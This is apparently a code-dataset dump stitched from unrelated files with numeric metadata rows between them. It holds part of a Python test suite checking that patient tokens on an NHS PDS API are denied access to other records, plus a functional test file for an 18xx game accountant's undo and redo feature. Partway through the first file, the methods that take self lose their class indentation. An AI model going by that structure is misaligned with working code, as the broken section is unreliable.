            f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/123456789",
            headers=headers,
        )
        body = r.json()
        assert r.status_code == 403
        assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
        assert (
            body["issue"][0]["details"]["coding"][0]["display"]
            == "Patient cannot perform this action"
        )
    async def test_patient_access_retrieve_incorrect_path(
        self, nhs_login_token_exchange
    ):
        """The search endpoint is not available to patient-access tokens:
        a Patient?... query returns 403 ACCESS_DENIED."""
        token = await nhs_login_token_exchange()
        headers = {
            "NHSD-SESSION-URID": "123",
            "Authorization": "Bearer " + token,
            "X-Request-ID": str(uuid.uuid4()),
        }
        r = requests.get(
            f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient?family=Smith&gender=female&birthdate=eq2010-10-22",
            headers=headers,
        )
        body = r.json()
        assert r.status_code == 403
        assert body["issue"][0]["details"]["coding"][0]["code"] == "ACCESS_DENIED"
        assert (
            body["issue"][0]["details"]["coding"][0]["display"]
            == "Patient cannot perform this action"
        )
    async def test_patient_access_update_happy_path(
        self, nhs_login_token_exchange, create_random_date
    ):
        """A patient can PATCH a record; the versionId increments by one."""
        token = await nhs_login_token_exchange()
        date = create_random_date
        # JSON-Patch payload replacing the date of birth
        patch_body = {
            "patches": [{"op": "replace", "path": "/birthDate", "value": date}]
        }
        headers = {
            "NHSD-SESSION-URID": "123",
            "Authorization": "Bearer " + token,
            "X-Request-ID": str(uuid.uuid4()),
        }
        # first GET the record to obtain the current Etag/version
        r = requests.get(
            f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
            headers=headers,
        )
        Etag = r.headers["Etag"]
        versionId = r.json()["meta"]["versionId"]
        headers = {
            "NHSD-SESSION-URID": "123",
            "Authorization": "Bearer " + token,
            "X-Request-ID": str(uuid.uuid4()),
            # optimistic locking: the PATCH must target the version just read
            "If-Match": Etag,
            "Content-Type": "application/json-patch+json",
        }
        r = requests.patch(
            f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
            headers=headers,
            json=patch_body,
        )
        assert r.status_code == 200
        # a successful update bumps the record version by exactly one
        assert int(r.json()["meta"]["versionId"]) == int(versionId) + 1
async def test_patient_access_update_non_matching_nhs_number(
    self, nhs_login_token_exchange, create_random_date
):
    """PATCHing a record other than the token holder's own (123456789
    instead of 9912003071) is refused with 403 / ACCESS_DENIED."""
    access_token = await nhs_login_token_exchange()
    new_birth_date = create_random_date
    patch_body = {
        "patches": [{"op": "replace", "path": "/birthDate", "value": new_birth_date}]
    }
    lookup_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
    }
    # Retrieve the patient's own record only to obtain a valid ETag.
    lookup = requests.get(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
        headers=lookup_headers,
    )
    patch_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
        "If-Match": lookup.headers["Etag"],
        "Content-Type": "application/json-patch+json",
    }
    response = requests.patch(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/123456789",
        headers=patch_headers,
        json=patch_body,
    )
    payload = response.json()
    assert response.status_code == 403
    denial = payload["issue"][0]["details"]["coding"][0]
    assert denial["code"] == "ACCESS_DENIED"
    assert denial["display"] == "Patient cannot perform this action"
async def test_patient_access_update_incorrect_path(
    self, nhs_login_token_exchange, create_random_date
):
    """PATCHing the Patient search path (rather than a record the token
    holder owns) is refused with 403 / ACCESS_DENIED."""
    access_token = await nhs_login_token_exchange()
    new_birth_date = create_random_date
    patch_body = {
        "patches": [{"op": "replace", "path": "/birthDate", "value": new_birth_date}]
    }
    lookup_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
    }
    # Retrieve the patient's own record only to obtain a valid ETag.
    lookup = requests.get(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
        headers=lookup_headers,
    )
    patch_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
        "If-Match": lookup.headers["Etag"],
        "Content-Type": "application/json-patch+json",
    }
    response = requests.patch(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient?family=Smith&gender=female&birthdate=eq2010-10-22",
        headers=patch_headers,
        json=patch_body,
    )
    payload = response.json()
    assert response.status_code == 403
    denial = payload["issue"][0]["details"]["coding"][0]
    assert denial["code"] == "ACCESS_DENIED"
    assert denial["display"] == "Patient cannot perform this action"
async def test_patient_access_retrieve_P5_scope(
    self, nhs_login_token_exchange
):
    """A token exchanged at proofing level P5 may not retrieve the record:
    expect 403 / ACCESS_DENIED."""
    access_token = await nhs_login_token_exchange(scope="P5")
    request_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
    }
    response = requests.get(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
        headers=request_headers,
    )
    payload = response.json()
    assert response.status_code == 403
    denial = payload["issue"][0]["details"]["coding"][0]
    assert denial["code"] == "ACCESS_DENIED"
    assert denial["display"] == "Patient cannot perform this action"
async def test_patient_access_retrieve_P0_scope(
    self, nhs_login_token_exchange
):
    """A token exchanged at proofing level P0 may not retrieve the record:
    expect 403 / ACCESS_DENIED."""
    access_token = await nhs_login_token_exchange(scope="P0")
    request_headers = {
        "NHSD-SESSION-URID": "123",
        "Authorization": "Bearer " + access_token,
        "X-Request-ID": str(uuid.uuid4()),
    }
    response = requests.get(
        f"{config.BASE_URL}/{config.PDS_BASE_PATH}/Patient/9912003071",
        headers=request_headers,
    )
    payload = response.json()
    assert response.status_code == 403
    denial = payload["issue"][0]["details"]["coding"][0]
    assert denial["code"] == "ACCESS_DENIED"
    assert denial["display"] == "Patient cannot perform this action"
| 31.116466
| 114
| 0.542463
| 817
| 7,748
| 4.95104
| 0.119951
| 0.031644
| 0.051422
| 0.083066
| 0.949073
| 0.93597
| 0.91199
| 0.905068
| 0.905068
| 0.895179
| 0
| 0.03769
| 0.311693
| 7,748
| 248
| 115
| 31.241935
| 0.720795
| 0
| 0
| 0.763285
| 0
| 0.009662
| 0.277362
| 0.104027
| 0
| 0
| 0
| 0
| 0.101449
| 1
| 0
| false
| 0
| 0.019324
| 0
| 0.024155
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81716aaf00fa6507e0c88090e44327471ba8828c
| 25,079
|
py
|
Python
|
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | null | null | null |
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | 7
|
2017-03-29T18:52:44.000Z
|
2017-09-05T19:06:29.000Z
|
accountant/functional_tests/test_undo.py
|
XeryusTC/18xx-accountant
|
5dc70fb96042807ceaaadb51cea3108da4f40d85
|
[
"MIT"
] | 1
|
2019-12-16T22:27:07.000Z
|
2019-12-16T22:27:07.000Z
|
# -*- coding: utf-8 -*-
from .base import FunctionalTestCase
from .pages import game
# Matches the timestamp prefix "[D-M HH:MM] " that precedes every log entry.
DATE_REGEX = r'\[\d{1,2}-\d{1,2} \d{2}:\d{2}\] '


class UndoTests(FunctionalTestCase):
    """Browser-driven functional tests for the undo/redo feature.

    Each test scripts a scenario through page objects (``game.Homepage``,
    ``game.GamePage``, transfer/share/operate forms), performs an action,
    then verifies that clicking undo reverts cash/share/log state and that
    clicking redo reapplies it. ``self.story(...)`` calls narrate the steps.
    """

    def test_can_undo_player_transfering_money_to_bank(self):
        """Undo/redo a player-to-bank cash transfer."""
        self.story('Alice is a user who has a game with a player')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        # Starting the game by submitting the bank-cash field directly.
        homepage.bank_cash.clear()
        homepage.bank_cash.send_keys('1000\n')
        # The game UUID is the last 36 characters of the game page URL.
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.story('Alice transfers some money to the bank')
        game_page = game.GamePage(self.browser)
        game_page.reload_game.click()
        transfer_form = game.TransferForm(self.browser)
        alice = game_page.get_players()[0]
        alice['row'].click()
        transfer_form.amount.send_keys('50\n')
        alice = game_page.get_players()[0]
        self.assertEqual(game_page.bank_cash.text, '1050')
        self.assertEqual(alice['cash'].text, '50')
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')
        self.story('There is an undo button, once it is clicked the game is '
                   'reverted to the previous state')
        game_page.undo.click()
        alice = game_page.get_players()[0]  # Get DOM updates
        self.assertEqual(game_page.bank_cash.text, '1000')
        self.assertEqual(alice['cash'].text, '100')
        self.assertEqual(len(game_page.log), 1)
        self.story('There is also a redo button, when that is clicked the '
                   'transfer happens again')
        game_page.redo.click()
        alice = game_page.get_players()[0]  # Get DOM updates
        self.assertEqual(game_page.bank_cash.text, '1050')
        self.assertEqual(alice['cash'].text, '50')
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')

    def test_can_undo_company_transfering_money_to_bank(self):
        """Undo/redo a company-to-bank cash transfer."""
        self.story('Alice is a user who has a game with a company')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_company(game_uuid, 'B&O', cash=1000)
        self.story('The B&O transfers some money to the bank')
        game_page = game.GamePage(self.browser)
        game_page.reload_game.click()
        transfer_form = game.TransferForm(self.browser)
        bno = game_page.get_companies()[0]
        bno['elem'].click()
        transfer_form.amount.send_keys('30\n')
        bno = game_page.get_companies()[0]
        # Default bank is 12000; it gains the 30 the company paid in.
        self.assertEqual(game_page.bank_cash.text, '12030')
        self.assertEqual(bno['cash'].text, '970')
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'B&O transfered 30 to the bank')
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        bno = game_page.get_companies()[0]
        self.assertEqual(game_page.bank_cash.text, '12000')
        # NOTE(review): stray trailing comma below makes this statement a
        # discarded one-element tuple — harmless, but likely unintended.
        self.assertEqual(bno['cash'].text, '1000'),
        self.assertEqual(len(game_page.log), 1)
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        bno = game_page.get_companies()[0]
        self.assertEqual(game_page.bank_cash.text, '12030')
        self.assertEqual(bno['cash'].text, '970')
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'B&O transfered 30 to the bank')

    def test_can_undo_player_transfering_money_to_company(self):
        """Undo/redo a player-to-company cash transfer."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.create_company(game_uuid, 'B&O', cash=1000)
        self.story('Alice transfers some money to the B&O')
        game_page = game.GamePage(self.browser)
        transfer_form = game.TransferForm(self.browser)
        game_page.reload_game.click()
        alice = game_page.get_players()[0]
        alice['row'].click()
        transfer_form.select_target('B&O')
        transfer_form.amount.send_keys('40\n')
        self.story('Verify transfer happened')
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=60)
        self.verify_company(bno, cash=1040)
        self.assertEqual(len(game_page.log), 2)
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=100)
        self.verify_company(bno, cash=1000)
        self.assertEqual(len(game_page.log), 1)
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=60)
        self.verify_company(bno, cash=1040)
        self.assertEqual(len(game_page.log), 2)

    def test_can_undo_company_transfering_money_to_player(self):
        """Undo/redo a company-to-player cash transfer."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.create_company(game_uuid, 'B&O', cash=1000)
        self.story('Alice transfers some money to the B&O')
        game_page = game.GamePage(self.browser)
        transfer_form = game.TransferForm(self.browser)
        game_page.reload_game.click()
        bno = game_page.get_companies()[0]
        bno['elem'].click()
        transfer_form.select_target('Alice')
        transfer_form.amount.send_keys('20\n')
        self.story('Verify transfer happened')
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=120)
        self.verify_company(bno, cash=980)
        self.assertEqual(len(game_page.log), 2)
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=100)
        self.verify_company(bno, cash=1000)
        self.assertEqual(len(game_page.log), 1)
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        alice = game_page.get_players()[0]
        bno = game_page.get_companies()[0]
        self.verify_player(alice, cash=120)
        self.verify_company(bno, cash=980)
        # NOTE(review): unlike the sibling tests, no log-length assertion
        # after redo here — possibly an oversight worth confirming.

    def test_can_undo_player_buying_share_from_ipo(self):
        """Undo/redo a player buying shares out of a company's IPO pool."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.create_company(game_uuid, 'B&O', cash=0, ipo_shares=3)
        self.story('Alice buys a share from the B&Os IPO')
        game_page = game.GamePage(self.browser)
        share_form = game.ShareForm(self.browser)
        game_page.reload_game.click()
        bno = game_page.get_companies()[0]
        bno.set_value(10)
        alice = game_page.get_players()[0]
        alice['row'].click()
        share_form.select_company('B&O')
        share_form.select_source('ipo')
        share_form.shares.clear()
        share_form.shares.send_keys('2\n')
        self.story('Verify that Alice bought the share')
        bno = game_page.get_companies()[0]
        alice = game_page.get_players()[0]
        # 2 shares at value 10 -> Alice pays 20; IPO payments go to the bank.
        self.verify_player(alice, cash=80, shares=['B&O 20%'])
        self.verify_company(bno, cash=0, ipo_shares=1, bank_shares=0)
        self.assertEqual(game_page.bank_cash.text, '12020')
        self.assertEqual(len(game_page.log), 2)
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        bno = game_page.get_companies()[0]
        alice = game_page.get_players()[0]
        self.verify_player(alice, cash=100, shares=[])
        self.verify_company(bno, cash=0, ipo_shares=3, bank_shares=0)
        self.assertEqual(game_page.bank_cash.text, '12000')
        self.assertEqual(len(game_page.log), 1)
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        bno = game_page.get_companies()[0]
        alice = game_page.get_players()[0]
        self.verify_player(alice, cash=80, shares=['B&O 20%'])
        self.verify_company(bno, cash=0, ipo_shares=1, bank_shares=0)
        self.assertEqual(game_page.bank_cash.text, '12020')
        self.assertEqual(len(game_page.log), 2)

    def test_can_undo_company_buying_share_from_bank(self):
        """Undo/redo a company buying another company's shares from the bank."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_company(game_uuid, 'CPR', cash=0, bank_shares=5,
                            ipo_shares=5)
        self.create_company(game_uuid, 'B&M', cash=100)
        self.story('B&M buys a share of CPR from the bank')
        game_page = game.GamePage(self.browser)
        share_form = game.ShareForm(self.browser)
        game_page.reload_game.click()
        bm, cpr = game_page.get_companies()
        cpr.set_value(20)
        bm['elem'].click()
        share_form.select_company('CPR')
        share_form.select_source('bank')
        share_form.shares.clear()
        share_form.shares.send_keys('4\n')
        self.story('Verify that shares have been bought')
        bm, cpr = game_page.get_companies()
        # 4 shares at value 20 -> B&M pays 80 into the bank.
        self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=1)
        self.verify_company(bm, cash=20, shares=['CPR 40%'])
        self.assertEqual(game_page.bank_cash.text, '12080')
        self.assertEqual(len(game_page.log), 2)
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        bm, cpr = game_page.get_companies()
        self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=5)
        self.verify_company(bm, cash=100, shares=[])
        self.assertEqual(game_page.bank_cash.text, '12000')
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        bm, cpr = game_page.get_companies()
        self.verify_company(cpr, cash=0, ipo_shares=5, bank_shares=1)
        self.verify_company(bm, cash=20, shares=['CPR 40%'])
        self.assertEqual(game_page.bank_cash.text, '12080')
        self.assertEqual(len(game_page.log), 2)

    def test_can_undo_player_buying_share_from_company_treasury(self):
        """Undo/redo a player buying shares held in the company's own treasury."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=300)
        co_uuid = self.create_company(game_uuid, 'C&O', cash=0, bank_shares=0,
                                      ipo_shares=0)
        # All 10 shares start in the C&O's own treasury.
        self.create_company_share(co_uuid, co_uuid, shares=10)
        self.story('Alice buys a share C&O from the C&O')
        game_page = game.GamePage(self.browser)
        share_form = game.ShareForm(self.browser)
        game_page.reload_game.click()
        alice = game_page.get_players()[0]
        co = game_page.get_companies()[0]
        co.set_value(30)
        alice['row'].click()
        share_form.select_company('C&O')
        share_form.select_source('C&O')
        share_form.shares.clear()
        share_form.shares.send_keys('6\n')
        self.story('Verify that shares have been bought')
        alice = game_page.get_players()[0]
        co = game_page.get_companies()[0]
        # 6 shares at value 30 -> Alice pays 180 directly to the company.
        self.verify_player(alice, cash=120, shares=['C&O 60%'])
        self.verify_company(co, cash=180, shares=['C&O 40%'])
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice = game_page.get_players()[0]
        co = game_page.get_companies()[0]
        self.verify_player(alice, cash=300, shares=[])
        self.verify_company(co, cash=0, shares=['C&O 100%'])
        self.story('Click the redo button, the transfer is done again')
        game_page.redo.click()
        alice = game_page.get_players()[0]
        co = game_page.get_companies()[0]
        self.verify_player(alice, cash=120, shares=['C&O 60%'])
        self.verify_company(co, cash=180, shares=['C&O 40%'])

    def test_can_undo_company_paying_dividends(self):
        """Undo/redo a company operating and paying full dividends."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
        bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
        bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
                                      ipo_shares=2)
        # Share split: company 1, Alice 4, Bob 3, IPO 2 (10 total).
        self.create_company_share(bo_uuid, bo_uuid, shares=1)
        self.create_player_share(alice_uuid, bo_uuid, shares=4)
        self.create_player_share(bob_uuid, bo_uuid, shares=3)
        self.story('The B&O operates and pays dividends')
        game_page = game.GamePage(self.browser)
        operate_form = game.OperateForm(self.browser)
        game_page.reload_game.click()
        bo = game_page.get_companies()[0]
        bo['elem'].click()
        operate_form.revenue.clear()
        operate_form.revenue.send_keys('80')
        operate_form.full.click()
        self.story('Verify that everyone has received money')
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        # 80 revenue split per 10% share: Alice 32, Bob 24, company 8.
        self.verify_player(alice, cash=32)
        self.verify_player(bob, cash=24)
        self.verify_company(bo, cash=8)
        self.assertEqual(game_page.bank_cash.text, '11936')
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=0)
        self.verify_player(bob, cash=0)
        self.verify_company(bo, cash=0)
        self.assertEqual(game_page.bank_cash.text, '12000')
        self.story('Click the redo button, the operation is done again')
        game_page.redo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=32)
        self.verify_player(bob, cash=24)
        self.verify_company(bo, cash=8)
        self.assertEqual(game_page.bank_cash.text, '11936')

    def test_can_undo_company_withholding_dividends(self):
        """Undo/redo a company operating and withholding all revenue."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
        bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
        bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
                                      ipo_shares=2)
        self.create_company_share(bo_uuid, bo_uuid, shares=1)
        self.create_player_share(alice_uuid, bo_uuid, shares=4)
        self.create_player_share(bob_uuid, bo_uuid, shares=3)
        self.story('The B&O operates and withholds dividends')
        game_page = game.GamePage(self.browser)
        operate_form = game.OperateForm(self.browser)
        game_page.reload_game.click()
        bo = game_page.get_companies()[0]
        bo['elem'].click()
        operate_form.revenue.clear()
        operate_form.revenue.send_keys('90')
        operate_form.withhold.click()
        self.story('Verify that only the B&O has received money')
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=0)
        self.verify_player(bob, cash=0)
        self.verify_company(bo, cash=90)
        self.assertEqual(game_page.bank_cash.text, '11910')
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=0)
        self.verify_player(bob, cash=0)
        self.verify_company(bo, cash=0)
        self.assertEqual(game_page.bank_cash.text, '12000')
        self.story('Click the redo button, the withholding is done again')
        game_page.redo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=0)
        self.verify_player(bob, cash=0)
        self.verify_company(bo, cash=90)
        self.assertEqual(game_page.bank_cash.text, '11910')

    def test_can_undo_company_paying_half_dividends(self):
        """Undo/redo a company operating and paying half dividends."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        alice_uuid = self.create_player(game_uuid, 'Alice', cash=0)
        bob_uuid = self.create_player(game_uuid, 'Bob', cash=0)
        bo_uuid = self.create_company(game_uuid, 'B&O', cash=0, bank_shares=0,
                                      ipo_shares=2)
        self.create_company_share(bo_uuid, bo_uuid, shares=1)
        self.create_player_share(alice_uuid, bo_uuid, shares=4)
        self.create_player_share(bob_uuid, bo_uuid, shares=3)
        self.story('The B&O operates and pays half dividends')
        game_page = game.GamePage(self.browser)
        operate_form = game.OperateForm(self.browser)
        game_page.reload_game.click()
        bo = game_page.get_companies()[0]
        bo['elem'].click()
        operate_form.revenue.clear()
        operate_form.revenue.send_keys('100')
        operate_form.half.click()
        self.story('Verify that everyone received the correct amounts')
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        # Half of 100 is distributed per share; the rest stays with the B&O.
        self.verify_player(alice, cash=20)
        self.verify_player(bob, cash=15)
        self.verify_company(bo, cash=55)
        self.assertEqual(game_page.bank_cash.text, '11910')
        self.story('Click the undo button, the game state is reverted')
        game_page.undo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=0)
        self.verify_player(bob, cash=0)
        self.verify_company(bo, cash=0)
        self.assertEqual(game_page.bank_cash.text, '12000')
        self.story('Click the redo button, the split payment is done again')
        game_page.redo.click()
        alice, bob = game_page.get_players()
        bo = game_page.get_companies()[0]
        self.verify_player(alice, cash=20)
        self.verify_player(bob, cash=15)
        self.verify_company(bo, cash=55)
        self.assertEqual(game_page.bank_cash.text, '11910')

    def test_log_does_not_show_undone_log_actions(self):
        """Undone log entries stay hidden across soft reload and hard refresh,
        and reappear after redo."""
        self.story('Alice is a user who has a game with a player')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.story('Alice transfers some money to the bank')
        game_page = game.GamePage(self.browser)
        game_page.reload_game.click()
        transfer_form = game.TransferForm(self.browser)
        alice = game_page.get_players()[0]
        alice['row'].click()
        transfer_form.amount.send_keys('50\n')
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')
        self.story('Click the undo button, an item is removed from the log')
        game_page.undo.click()
        self.assertEqual(len(game_page.log), 1)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'New game started')
        self.story('Soft reload the page, the undone item is still not shown')
        game_page.reload_game.click()
        self.assertEqual(len(game_page.log), 1)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'New game started')
        self.story('Hard refresh the page, the undone item is still not shown')
        self.browser.refresh()
        self.assertEqual(len(game_page.log), 1)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'New game started')
        self.story('Click the redo button, the undone item is shown again')
        game_page.redo.click()
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')
        self.story('Soft reload the page, the item is still there')
        game_page.reload_game.click()
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')
        self.story('Hard refresh the page, the item is still visible')
        self.browser.refresh()
        self.assertEqual(len(game_page.log), 2)
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Alice transfered 50 to the bank')

    def test_undo_button_disabled_when_action_cant_be_undone(self):
        """Undo stays disabled after actions that are not undoable:
        game/player/company creation and company edits."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        self.story("The game creating can't be undone")
        game_page = game.GamePage(self.browser)
        self.assertFalse(game_page.undo.is_enabled())
        self.story("Can't undo player creation")
        game_page.add_player_link.click()
        add_player = game.AddPlayerPage(self.browser)
        add_player.name.send_keys('Alice\n')
        self.assertFalse(game_page.undo.is_enabled())
        self.story("Can't undo company creation")
        game_page.add_company_link.click()
        add_company = game.AddCompanyPage(self.browser)
        add_company.name.send_keys('B&M\n')
        self.assertFalse(game_page.undo.is_enabled())
        self.story("Can't undo editing a company")
        bm = game_page.get_companies()[0]
        bm['elem'].click()
        bm['edit'].click()
        edit_company = game.EditCompanyPage(self.browser)
        edit_company.name.clear()
        edit_company.name.send_keys('CPR\n')
        self.assertFalse(game_page.undo.is_enabled())

    def test_undone_actions_not_in_log_after_doing_new_action(self):
        """Performing a new action after an undo discards the undone entry
        from the log (no branching history)."""
        self.story('Alice is a user who has a game')
        self.browser.get(self.server_url)
        homepage = game.Homepage(self.browser)
        homepage.start_button.click()
        game_uuid = self.browser.current_url[-36:]
        self.create_player(game_uuid, 'Alice', cash=100)
        self.create_player(game_uuid, 'Bob', cash=100)
        self.story('Alice transfers some money to the bank')
        game_page = game.GamePage(self.browser)
        game_page.reload_game.click()
        transfer_form = game.TransferForm(self.browser)
        alice, bob = game_page.get_players()
        alice['row'].click()
        transfer_form.amount.send_keys('60\n')
        self.story('The transfer action has been done')
        self.assertEqual(len(game_page.log), 2)
        self.story('Undo the transfer action because Bob was meant to do it')
        game_page.undo.click()
        alice, bob = game_page.get_players()
        bob['row'].click()
        transfer_form.amount.send_keys('60\n')
        self.story("Alice's action doesn't show in the log")
        self.assertRegex(game_page.log[1].text,
                         DATE_REGEX + 'New game started')
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Bob transfered 60 to the bank')
        self.assertEqual(len(game_page.log), 2)
        self.story("After soft refresh it still doesn't show")
        game_page.reload_game.click()
        self.assertRegex(game_page.log[1].text,
                         DATE_REGEX + 'New game started')
        self.assertRegex(game_page.log[0].text,
                         DATE_REGEX + 'Bob transfered 60 to the bank')
        self.assertEqual(len(game_page.log), 2)
| 43.017153
| 79
| 0.649029
| 3,551
| 25,079
| 4.384117
| 0.059983
| 0.095581
| 0.047341
| 0.046249
| 0.905768
| 0.882965
| 0.862089
| 0.848664
| 0.83222
| 0.802801
| 0
| 0.026618
| 0.230033
| 25,079
| 582
| 80
| 43.091065
| 0.779596
| 0.002113
| 0
| 0.794118
| 0
| 0.001961
| 0.146791
| 0
| 0
| 0
| 0
| 0
| 0.141176
| 1
| 0.02549
| false
| 0
| 0.003922
| 0
| 0.031373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a9c46d450b5f9db6796d8f2aa2104e32d556ab
| 265
|
py
|
Python
|
matilda/fundamental_analysis/equity_valuation_models/__init__.py
|
AlainDaccache/Quantropy
|
